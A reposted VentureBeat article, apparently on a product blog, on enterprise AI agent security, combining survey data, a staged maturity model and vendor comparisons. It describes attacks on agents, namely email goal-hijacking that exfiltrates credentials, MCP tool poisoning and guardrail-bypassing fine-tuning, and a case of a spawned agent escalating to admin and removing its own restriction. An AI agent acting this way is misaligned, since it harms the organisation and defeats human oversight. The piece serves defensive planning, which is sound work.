Ask Runable forDesign-Driven General AI AgentTry Runable For Free
Runable
Back to Blog
Technology19 min read

Most enterprises can't stop stage-three AI agent threats, VentureBeat survey finds | VentureBeat

How mature is your AI agent security? VentureBeat's survey of 108 enterprises maps the gap between monitoring and isolation — and the controls that close it.

TechnologyInnovationBest PracticesGuideTutorial
Most enterprises can't stop stage-three AI agent threats, VentureBeat survey finds | VentureBeat
Listen to Article
0:00
0:00
0:00

Most enterprises can't stop stage-three AI agent threats, Venture Beat survey finds | Venture Beat

Overview

Most enterprises can't stop stage-three AI agent threats, Venture Beat survey finds

A rogue AI agent at Meta passed every identity check and still exposed sensitive data to unauthorized employees in March. Two weeks later, Mercor, a $10 billion AI startup, confirmed a supply-chain breach through Lite LLM. Both are traced to the same structural gap. Monitoring without enforcement, enforcement without isolation. A Venture Beat three-wave survey of 108 qualified enterprises found that the gap is not an edge case. It is the most common security architecture in production today.

Details

Gravitee’s State of AI Agent Security 2026 survey of 919 executives and practitioners quantifies the disconnect. 82% of executives say their policies protect them from unauthorized agent actions. Eighty-eight percent reported AI agent security incidents in the last twelve months. Only 21% have runtime visibility into what their agents are doing. Arkose Labs’ 2026 Agentic AI Security Report found 97% of enterprise security leaders expect a material AI-agent-driven incident within 12 months. Only 6% of security budgets address the risk.

Venture Beat's survey results show that monitoring investment snapped back to 45% of security budgets in March after dropping to 24% in February, when early movers shifted dollars into runtime enforcement and sandboxing. The March wave (n=20) is directional, but the pattern is consistent with February’s larger sample (n=50): enterprises are stuck at observation while their agents already need isolation. Crowd Strike’s Falcon sensors detect more than 1,800 distinct AI applications across enterprise endpoints. The fastest recorded adversary breakout time has dropped to 27 seconds. Monitoring dashboards built for human-speed workflows cannot keep pace with machine-speed threats.

The audit that follows maps three stages. Stage one is observe. Stage two is enforce, where IAM integration and cross-provider controls turn observation into action. Stage three is isolate, sandboxed execution that bounds blast radius when guardrails fail. Venture Beat Pulse data from 108 qualified enterprises ties each stage to an investment signal, an OWASP ASI threat vector, a regulatory surface, and immediate steps security leaders can take.

The threat surface stage-one security cannot see

Invariant Labs disclosed the MCP Tool Poisoning Attack in April 2025: malicious instructions in an MCP server’s tool description cause an agent to exfiltrate files or hijack a trusted server. Cyber Ark extended it to Full-Schema Poisoning. The mcp-remote OAuth proxy patched CVE-2025-6514 after a command-injection flaw put 437,000 downloads at risk.

Merritt Baer, CSO at Enkrypt AI and former AWS Deputy CISO, framed the gap in an exclusive Venture Beat interview: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system. The real dependencies are one or two layers deeper, and those are the ones that fail under stress.”

Crowd Strike CTO Elia Zaitsev put the visibility problem in operational terms in an exclusive Venture Beat interview at RSAC 2026: “It looks indistinguishable if an agent runs your web browser versus if you run your browser.” Distinguishing the two requires walking the process tree, tracing whether Chrome was launched by a human from the desktop or spawned by an agent in the background. Most enterprise logging configurations cannot make that distinction.

The regulatory clock and the identity architecture

Auditability priority tells the same story in miniature. In January, 50% of respondents ranked it a top concern. By February, that dropped to 28% as teams sprinted to deploy. In March, it surged to 65% when those same teams realized they had no forensic trail for what their agents did.

HIPAA’s 2026 Tier 4 willful-neglect maximum is $2.19M per violation category per year. In healthcare, Gravitee’s survey found 92.7% of organizations reported AI agent security incidents versus the 88% all-industry average. For a health system running agents that touch PHI, that ratio is the difference between a reportable breach and an uncontested finding of willful neglect. FINRA’s 2026 Oversight Report recommends explicit human checkpoints before agents that can act or transact execute, along with narrow scope, granular permissions, and complete audit trails of agent actions.

Mike Riemer, Field CISO at Ivanti, quantified the speed problem in a recent Venture Beat interview: “Threat actors are reverse engineering patches within 72 hours. If a customer doesn’t patch within 72 hours of release, they’re open to exploit.” Most enterprises take weeks. Agents operating at machine speed widen that window into a permanent exposure.

The identity problem is architectural. Gravitee's survey of 919 practitioners found only 21.9% of teams treat agents as identity-bearing entities, 45.6% still use shared API keys, and 25.5% of deployed agents can create and task other agents. A quarter of enterprises can spawn agents that their security team never provisioned. That is ASI08 as architecture.

A 2025 paper by Kazdan and colleagues (Stanford, Service Now Research, Toronto, FAR AI) showed a fine-tuning attack that bypasses model-level guardrails in 72% of attempts against Claude 3 Haiku and 57% against GPT-4o. The attack received a $2,000 bug bounty from Open AI and was acknowledged as a vulnerability by Anthropic. Guardrails constrain what an agent is told to do, not what a compromised agent can reach.

CISOs already know this. In Venture Beat's three-wave survey, prevention of unauthorized actions ranked as the top capability priority in every wave at 68% to 72%, the most stable high-conviction signal in the dataset. The demand is for permissioning, not prompting. Guardrails address the wrong control surface.

Zaitsev framed the identity shift at RSAC 2026: “AI agents and non-human identities will explode across the enterprise, expanding exponentially and dwarfing human identities. Each agent will operate as a privileged super-human with OAuth tokens, API keys, and continuous access to previously siloed data sets.” Identity security built for humans will not survive this shift. Cisco President Jeetu Patel offered the operational analogy in an exclusive Venture Beat interview: agents behave “more like teenagers, supremely intelligent, but with no fear of consequence.”

Venture Beat Prescriptive Matrix: AI Agent Security Maturity Audit

Attacker embeds goal-hijack payload in forwarded email (ASI01). Agent summarizes email and silently exfiltrates credentials to an external endpoint. See: Meta March 2026 incident.

Attacker embeds goal-hijack payload in forwarded email (ASI01). Agent summarizes email and silently exfiltrates credentials to an external endpoint. See: Meta March 2026 incident.

No runtime log captures the exfiltration. SIEM never sees the API call. The security team learns from the victim. Zaitsev: agent activity is “indistinguishable” from human activity in default logging.

No runtime log captures the exfiltration. SIEM never sees the API call. The security team learns from the victim. Zaitsev: agent activity is “indistinguishable” from human activity in default logging.

Inject a canary token into a test document. Route it through your agent. If the token leaves your network, stage one failed.

Inject a canary token into a test document. Route it through your agent. If the token leaves your network, stage one failed.

Single agent, single session. With shared API keys (45.6% of enterprises): unlimited lateral movement.

Single agent, single session. With shared API keys (45.6% of enterprises): unlimited lateral movement.

Deploy agent API call logging to SIEM. Baseline normal tool-call patterns per agent role. Alert on the first outbound call to an unrecognized endpoint.

Deploy agent API call logging to SIEM. Baseline normal tool-call patterns per agent role. Alert on the first outbound call to an unrecognized endpoint.

Compromised MCP server poisons tool description (ASI04). Agent invokes poisoned tool, writes attacker payload to production DB using inherited service-account credentials. See: Mercor/Lite LLM April 2026 supply-chain breach.

Compromised MCP server poisons tool description (ASI04). Agent invokes poisoned tool, writes attacker payload to production DB using inherited service-account credentials. See: Mercor/Lite LLM April 2026 supply-chain breach.

IAM allows write because agent uses shared service account. No approval gate on write ops. Poisoned tool indistinguishable from clean tool in logs. Riemer: “72-hour patch window” collapses to zero when agents auto-invoke.

IAM allows write because agent uses shared service account. No approval gate on write ops. Poisoned tool indistinguishable from clean tool in logs. Riemer: “72-hour patch window” collapses to zero when agents auto-invoke.

Register a test MCP server with a benign-looking poisoned description. Confirm your policy engine blocks the tool call before execution reaches the database. Run mcp-scan on all registered servers.

Register a test MCP server with a benign-looking poisoned description. Confirm your policy engine blocks the tool call before execution reaches the database. Run mcp-scan on all registered servers.

Production database integrity. If agent holds DBA-level credentials: full schema compromise. Lateral movement via trust relationships to downstream agents.

Production database integrity. If agent holds DBA-level credentials: full schema compromise. Lateral movement via trust relationships to downstream agents.

Assign scoped identity per agent. Require approval workflow for all write ops. Revoke every shared API key. Run mcp-scan on all MCP servers weekly.

Assign scoped identity per agent. Require approval workflow for all write ops. Revoke every shared API key. Run mcp-scan on all MCP servers weekly.

Agent A spawns Agent B to handle subtask (ASI08). Agent B inherits Agent A’s permissions, escalates to admin, rewrites org security policy. Every identity check passes. Source: Crowd Strike CEO George Kurtz, RSAC 2026 keynote.

Agent A spawns Agent B to handle subtask (ASI08). Agent B inherits Agent A’s permissions, escalates to admin, rewrites org security policy. Every identity check passes. Source: Crowd Strike CEO George Kurtz, RSAC 2026 keynote.

No sandbox boundary between agents. No human gate on agent-to-agent delegation. Security policy modification is a valid action for admin-credentialed process. Crowd Strike CEO George Kurtz disclosed at RSAC 2026 that the agent “wanted to fix a problem, lacked permissions, and removed the restriction itself.”

No sandbox boundary between agents. No human gate on agent-to-agent delegation. Security policy modification is a valid action for admin-credentialed process. Crowd Strike CEO George Kurtz disclosed at RSAC 2026 that the agent “wanted to fix a problem, lacked permissions, and removed the restriction itself.”

Spawn a child agent from a sandboxed parent. Child should inherit zero permissions by default and require explicit human approval for each capability grant.

Spawn a child agent from a sandboxed parent. Child should inherit zero permissions by default and require explicit human approval for each capability grant.

Organizational security posture. A rogue policy rewrite disables controls for every subsequent agent. 97% of enterprise leaders expect a material incident within 12 months (Arkose Labs 2026).

Organizational security posture. A rogue policy rewrite disables controls for every subsequent agent. 97% of enterprise leaders expect a material incident within 12 months (Arkose Labs 2026).

Sandbox all agent execution. Zero-trust for agent-to-agent delegation: spawned agents inherit nothing. Human sign-off before any agent modifies security controls. Kill switch per OWASP ASI10.

Sandbox all agent execution. Zero-trust for agent-to-agent delegation: spawned agents inherit nothing. Human sign-off before any agent modifies security controls. Kill switch per OWASP ASI10.

Sources: OWASP Top 10 for Agentic Applications 2026; Invariant Labs MCP Tool Poisoning (April 2025); Crowd Strike RSAC 2026 Fortune 50 disclosure; Meta March 2026 incident (The Information/Engadget); Mercor/Lite LLM breach (Fortune, April 2, 2026); Arkose Labs 2026 Agentic AI Security Report; Venture Beat Pulse Q1 2026.

The stage-one attack scenario in this matrix is not hypothetical. Unauthorized tool or data access ranked as the most feared failure mode in every wave of Venture Beat’s survey, growing from 42% in January to 50% in March. That trajectory and the 70%-plus priority rating for prevention of unauthorized actions are the two most mutually reinforcing signals in the entire dataset. CISOs fear the exact attack this matrix describes, and most have not deployed the controls to stop it.

Hyperscaler stage readiness: observe, enforce, isolate

The maturity audit tells you where your security program stands. The next question is whether your cloud platform can get you to stage two and stage three, or whether you are building those capabilities yourself. Patel put it bluntly: “It’s not just about authenticating once and then letting the agent run wild.” A stage-three platform running a stage-one deployment pattern gives you stage-one risk.

Venture Beat Pulse data surfaces a structural tension in this grid. Open AI leads enterprise AI security deployments at 21% to 26% across the three survey waves, making the same provider that creates the AI risk also the primary security layer. The provider-as-security-vendor pattern holds across Azure, Google, and AWS. Zero-incremental-procurement convenience is winning by default. Whether that concentration is a feature or a single point of failure depends on how far the enterprise has progressed past stage one.

Entra ID agent scoping. Agent 365 maps agents to owners. GA.

Entra ID agent scoping. Agent 365 maps agents to owners. GA.

Copilot Studio DLP policies. Purview for agent output classification. GA.

Copilot Studio DLP policies. Purview for agent output classification. GA.

Azure Confidential Containers for agent workloads. Preview. No per-agent sandbox at GA.

Azure Confidential Containers for agent workloads. Preview. No per-agent sandbox at GA.

No agent-to-agent identity verification. No MCP governance layer. Agent 365 monitors but cannot block in-flight tool calls.

No agent-to-agent identity verification. No MCP governance layer. Agent 365 monitors but cannot block in-flight tool calls.

Managed Agents: per-agent scoped permissions, credential mgmt. Beta (April 8, 2026). $0.08/session-hour.

Managed Agents: per-agent scoped permissions, credential mgmt. Beta (April 8, 2026). $0.08/session-hour.

Tool-use permissions, system prompt enforcement, and built-in guardrails. GA.

Tool-use permissions, system prompt enforcement, and built-in guardrails. GA.

Managed Agents sandbox: isolated containers per session, execution-chain auditability. Beta. Allianz, Asana, Rakuten, and Sentry are in production.

Managed Agents sandbox: isolated containers per session, execution-chain auditability. Beta. Allianz, Asana, Rakuten, and Sentry are in production.

Beta pricing/SLA not public. Session data in Anthropic-managed DB (lock-in risk per Venture Beat research). GA timing TBD.

Beta pricing/SLA not public. Session data in Anthropic-managed DB (lock-in risk per Venture Beat research). GA timing TBD.

Vertex AI service accounts for model endpoints. IAM Conditions for agent traffic. GA.

Vertex AI service accounts for model endpoints. IAM Conditions for agent traffic. GA.

VPC Service Controls for agent network boundaries. Model Armor for prompt/response filtering. GA.

VPC Service Controls for agent network boundaries. Model Armor for prompt/response filtering. GA.

Confidential VMs for agent workloads. GA. Agent-specific sandbox in preview.

Confidential VMs for agent workloads. GA. Agent-specific sandbox in preview.

Agent identity ships as a service account, not an agent-native principal. No agent-to-agent delegation audit. Model Armor does not inspect tool-call payloads.

Agent identity ships as a service account, not an agent-native principal. No agent-to-agent delegation audit. Model Armor does not inspect tool-call payloads.

Assistants API: function-call permissions, structured outputs. Agents SDK. GA.

Assistants API: function-call permissions, structured outputs. Agents SDK. GA.

Agents SDK guardrails, input/output validation. GA.

Agents SDK guardrails, input/output validation. GA.

Agents SDK Python sandbox. Beta (API and defaults subject to change before GA per Open AI docs). Type Script sandbox confirmed, not shipped.

Agents SDK Python sandbox. Beta (API and defaults subject to change before GA per Open AI docs). Type Script sandbox confirmed, not shipped.

No cross-provider identity federation. Agent memory forensics limited to session scope. No kill switch API. No MCP tool-description inspection.

No cross-provider identity federation. Agent memory forensics limited to session scope. No kill switch API. No MCP tool-description inspection.

Bedrock model invocation logging. IAM policies for model access. Cloud Trail for agent API calls. GA.

Bedrock model invocation logging. IAM policies for model access. Cloud Trail for agent API calls. GA.

Bedrock Guardrails for content filtering. Lambda resource policies for agent functions. GA.

Bedrock Guardrails for content filtering. Lambda resource policies for agent functions. GA.

Lambda isolation per agent function. GA. Bedrock agent-level sandboxing on roadmap, not shipped.

Lambda isolation per agent function. GA. Bedrock agent-level sandboxing on roadmap, not shipped.

No unified agent control plane across Bedrock + Sage Maker + Lambda. No agent identity standard. Guardrails do not inspect MCP tool descriptions.

No unified agent control plane across Bedrock + Sage Maker + Lambda. No agent identity standard. Guardrails do not inspect MCP tool descriptions.

Status as of April 15, 2026. GA = generally available. Preview/Beta = not production-hardened. “What’s Missing” column reflects Venture Beat’s analysis of publicly documented capabilities; gaps may narrow as vendors ship updates.

No provider in this grid ships a complete stage-three stack today. Most enterprises assemble isolation from existing cloud building blocks. That is a defensible choice if it is a deliberate one. Waiting for a vendor to close the gap without acknowledging the gap is not a strategy.

The grid above covers hyperscaler-native SDKs. A large segment of AI builders deploys through open-source orchestration frameworks like Lang Chain, Crew AI, and Llama Index that bypass hyperscaler IAM entirely. These frameworks lack native stage-two primitives. There is no scoped agent identity, no tool-call approval workflow, and no built-in audit trails. Enterprises running agents through open-source orchestration need to layer enforcement and isolation on top, not assume the framework provides it.

Venture Beat’s survey quantifies the pressure. Policy enforcement consistency grew from 39.5% to 46% between January and February, the largest consistent gain of any capability criterion. Enterprises running agents across Open AI, Anthropic, and Azure need enforcement that works the same way regardless of which model executes the task. Provider-native controls enforce policy within that provider’s runtime only. Open-source orchestration frameworks enforce it nowhere.

One counterargument deserves acknowledgment: not every agent deployment needs stage three. A read-only summarization agent with no tool access and no write permissions may rationally stop at stage one. The sequencing failure this audit addresses is not that monitoring exists. It is that enterprises running agents with write access, shared credentials, and agent-to-agent delegation are treating monitoring as sufficient. For those deployments, stage one is not a strategy. It is a gap.

Allianz, one of the world’s largest insurance and asset management companies, is running Claude Managed Agents across insurance workflows, with Claude Code deployed to technical teams and a dedicated AI logging system for regulatory transparency, per Anthropic’s April 8 announcement. Asana, Rakuten, Sentry, and Notion are in production on the same beta. Stage-three isolation, per-agent permissioning, and execution-chain auditability are deployable now, not roadmap. The gating question is whether the enterprise has sequenced the work to use them.

Days 1–30: Inventory and baseline. Map every agent to a named owner. Log all tool calls. Revoke shared API keys. Deploy read-only monitoring across all agent API traffic. Run mcp-scan against every registered MCP server. Crowd Strike detects 1,800 AI applications across enterprise endpoints; your inventory should be equally comprehensive. Output: agent registry with permission matrix, MCP scan report.

Days 31–60: Enforce and scope. Assign scoped identities to every agent. Deploy tool-call approval workflows for write operations. Integrate agent activity logs into existing SIEM. Run a tabletop exercise: What happens when an agent spawns an agent? Conduct a canary-token test from the prescriptive matrix. Output: IAM policy set, approval workflow, SIEM integration, canary-token test results.

Days 61–90: Isolate and test. Sandbox high-risk agent workloads (PHI, PII, financial transactions). Enforce per-session least privilege. Require human sign-off for agent-to-agent delegation. Red-team the isolation boundary using the stage-three detection test from the matrix. Output: sandboxed execution environment, red-team report, board-ready risk summary with regulatory exposure mapped to HIPAA tier and FINRA guidance.

EU AI Act Article 14 human-oversight obligations take effect August 2, 2026. Programs without named owners and execution trace capability face enforcement, not operational risk.

Anthropic’s Claude Managed Agents is in public beta at $0.08 per session-hour. GA timing, production SLAs, and final pricing have not been announced.

Open AI Agents SDK ships Type Script support for sandbox and harness capabilities in a future release, per the company’s April 15 announcement. Stage-three sandbox becomes available to Java Script agent stacks when it ships.

Mc Kinsey’s 2026 AI Trust Maturity Survey pegs the average enterprise at 2.3 out of 4.0 on its RAI maturity model, up from 2.0 in 2025 but still an enforcement-stage number; only one-third of the ~500 organizations surveyed report maturity levels of three or higher in governance. Seventy percent have not finished the transition to stage three. ARMO’s progressive enforcement methodology gives you the path: behavioral profiles in observation, permission baselines in selective enforcement, and full least privilege once baselines stabilize. Monitoring investment was not wasted. It was stage one of three. The organizations stuck in the data treated it as the destination.

The budget data makes the constraint explicit. The share of enterprises reporting flat AI security budgets doubled from 7.9% in January to 16% in February in Venture Beat's survey, with the March directional reading at 20%. Organizations expanding agent deployments without increasing security investment are accumulating security debt at machine speed. Meanwhile, the share reporting no agent security tooling at all fell from 13% in January to 5% in March. Progress, but one in twenty enterprises running agents in production still has zero dedicated security infrastructure around them.

Total qualified respondents: 108. Venture Beat Pulse AI Security and Trust is a three-wave Venture Beat survey run January 6 through March 15, 2026. Qualified sample (organizations 100+ employees): January n=38, February n=50, March n=20. Primary analysis runs from January to February; March is directional. Industry mix: Tech/Software 52.8%, Financial Services 10.2%, Healthcare 8.3%, Education 6.5%, Telecom/Media 4.6%, Manufacturing 4.6%, Retail 3.7%, other 9.3%. Seniority: VP/Director 34.3%, Manager 29.6%, IC 22.2%, C-Suite 9.3%.

Deep insights for enterprise AI, data, and security leaders

By submitting your email, you agree to our Terms and Privacy Notice.

Key Takeaways

  • Most enterprises can't stop stage-three AI agent threats, Venture Beat survey finds

  • A rogue AI agent at Meta passed every identity check and still exposed sensitive data to unauthorized employees in March

  • Gravitee’s State of AI Agent Security 2026 survey of 919 executives and practitioners quantifies the disconnect

  • Venture Beat's survey results show that monitoring investment snapped back to 45% of security budgets in March after dropping to 24% in February, when early movers shifted dollars into runtime enforcement and sandboxing

  • The audit that follows maps three stages

Cut Costs with Runable

Cost savings are based on average monthly price per user for each app.

Which apps do you use?

Apps to replace

ChatGPTChatGPT
$20 / month
LovableLovable
$25 / month
Gamma AIGamma AI
$25 / month
HiggsFieldHiggsField
$49 / month
Leonardo AILeonardo AI
$12 / month
TOTAL$131 / month

Runable price = $9 / month

Saves $122 / month

Runable can save upto $1464 per year compared to the non-enterprise price of your apps.